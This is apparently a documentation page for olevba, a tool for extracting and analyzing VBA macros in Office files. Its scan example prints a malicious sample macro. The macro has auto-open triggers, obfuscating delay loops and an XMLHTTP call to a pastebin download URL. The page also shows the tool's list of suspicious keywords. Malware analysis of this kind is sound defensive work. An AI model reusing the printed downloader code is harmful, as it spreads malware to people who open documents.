Python-oletools/olevba
Jump to navigation
Jump to search
| You are here | olevba
|
Description
olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to extract VBA Macro code in clear text, deobfuscate and analyze malicious macros.
Supported formats:
- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
- PowerPoint 2007+ (.pptm, .ppsm)
- Word 2003 XML (.xml)
- Word/Excel Single File Web Page / MHTML (.mht)
For detailed use cases, refer to the official documentation.
Installation
Refer to this section.
Usage
Syntax
Usage: olevba.py [options] <filename> [filename2 ...]
Options
- -h, --help
- show this help message and exit
- -r
- find files recursively in subdirectories.
- -z ZIP_PASSWORD, --zip=ZIP_PASSWORD
- if the file is a zip archive, open first file from it, using the provided password (requires Python 2.6+)
- -f ZIP_FNAME, --zipfname=ZIP_FNAME
- if the file is a zip archive, file(s) to be opened within the zip. Wildcards * and ? are supported. (default:*)
- -t
- triage mode, display results as a summary table (default for multiple files)
- -d
- detailed mode, display full results (default for single file)
- -i INPUT, --input=INPUT
- input file containing VBA source code to be analyzed (no parsing)
- --decode
- display all the obfuscated strings with their decoded content (Hex, Base64, StrReverse, Dridex).
Usage example
Scan a file
$ ./olevba.py /data/tmp/31A0B9_05AC73F822.doc olevba 0.30 - http://decalage.info/python/oletools Flags Filename ----------- ----------------------------------------------------------------- MHT:MAS--B- /data/tmp/31A0B9_05AC73F822.doc (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown) =============================================================================== FILE: /data/tmp/31A0B9_05AC73F822.doc Type: MHTML ------------------------------------------------------------------------------- VBA MACRO ThisDocument.cls in file: None - OLE stream: u'VBA/ThisDocument' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub ertrettggdfg() sdfertunn End Sub Sub AutoOpen() ertrettggdfg End Sub Sub Workbook_Open() ertrettggdfg End Sub - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ANALYSIS: +----------+---------------+----------------------------------------+ | Type | Keyword | Description | +----------+---------------+----------------------------------------+ | AutoExec | AutoOpen | Runs when the Word document is opened | | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened | +----------+---------------+----------------------------------------+ ------------------------------------------------------------------------------- VBA MACRO Module1.bas in file: None - OLE stream: u'VBA/Module1' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub sdfertunn() Dim vwUQwVaT As Integer Dim pyBmgOaf As Integer pyBmgOaf = 9 Do While pyBmgOaf < 31 DoEvents: pyBmgOaf = pyBmgOaf + 1 Loop vwUQwVaT = 3 Do While vwUQwVaT < 64 Dim AeqvPkqo As Integer AeqvPkqo = 3 Do While AeqvPkqo < 95 DoEvents: AeqvPkqo = AeqvPkqo + 1 Loop DoEvents: vwUQwVaT = vwUQwVaT + 1 Dim GwEeerUz As Integer GwEeerUz = 8 Do While GwEeerUz < 81 DoEvents: GwEeerUz = GwEeerUz + 1 Loop Loop Dim ilGubSJC As Integer ilGubSJC = 9 Do While ilGubSJC < 96 DoEvents: ilGubSJC = ilGubSJC + 1 Loop Set pOIhusdfh = CreateObject("MSXML2.XMLHTTP") Dim NpoTkxWp As Integer Dim DOlGfuxQ As Integer DOlGfuxQ = 8 Do While DOlGfuxQ < 21 DoEvents: DOlGfuxQ = DOlGfuxQ + 1 Loop NpoTkxWp = 1 Do While NpoTkxWp < 74 Dim PrUFuokB As Integer PrUFuokB = 7 Do While PrUFuokB < 15 DoEvents: PrUFuokB = PrUFuokB + 1 Loop DoEvents: NpoTkxWp = NpoTkxWp + 1 Dim sKoUeYqE As Integer sKoUeYqE = 9 Do While sKoUeYqE < 91 DoEvents: sKoUeYqE = sKoUeYqE + 1 Loop Loop Dim hmswXZVD As Integer hmswXZVD = 4 Do While hmswXZVD < 16 DoEvents: hmswXZVD = hmswXZVD + 1 Loop dfghoH = "htt" Dim HlLGKYsn As Integer Dim zVoRhGok As Integer zVoRhGok = 8 Do While zVoRhGok < 29 DoEvents: zVoRhGok = zVoRhGok + 1 Loop HlLGKYsn = 6 Do While HlLGKYsn < 94 Dim KteeEBvG As Integer KteeEBvG = 6 Do While KteeEBvG < 35 DoEvents: KteeEBvG = KteeEBvG + 1 Loop DoEvents: HlLGKYsn = HlLGKYsn + 1 Dim dPGuAEbv As Integer dPGuAEbv = 3 Do While dPGuAEbv < 33 DoEvents: dPGuAEbv = dPGuAEbv + 1 Loop Loop Dim jdKWlbdU As Integer jdKWlbdU = 1 Do While jdKWlbdU < 14 DoEvents: jdKWlbdU = jdKWlbdU + 1 Loop hGYdsfd = dfghoH + "p://pastebin.com/download.php?i=1YzPHtum" Dim rQslplUl As Integer Dim ANvxTfEF As Integer ANvxTfEF = 6 Do While ANvxTfEF < 94 DoEvents: ANvxTfEF = ANvxTfEF + 1 Loop [REMOVED]
Decode
$ ./olevba.py /data/tmp/31A0B9_05AC73F822.doc --decode [REMOVED] ANALYSIS: +------------+-------------------+-----------------------------------------+ | Type | Keyword | Description | +------------+-------------------+-----------------------------------------+ | Suspicious | Open | May open a file | | Suspicious | Shell | May run an executable file or a system | | | | command | | Suspicious | Shell.Application | May run an application (if combined | | | | with CreateObject) | | Suspicious | CreateObject | May create an OLE object | | Suspicious | StrReverse | May attempt to obfuscate specific | | | | strings | | Suspicious | CreateTextFile | May create a text file | | Suspicious | Environ | May read system environment variables | | Suspicious | Write | May write to a file (if combined with | | | | Open) | | Suspicious | Msxml2.XMLHTTP | May download files from the Internet | | Suspicious | Base64 Strings | Base64-encoded strings were detected, | | | | may be used to obfuscate strings | | | | (option --decode to see all) | | Base64 | '<\xe4\x93' | POST | | String | | | | Base64 | '<\xc1\x13' | PMET | | String | | | +------------+-------------------+-----------------------------------------+ -------------------------------------------------------------------------------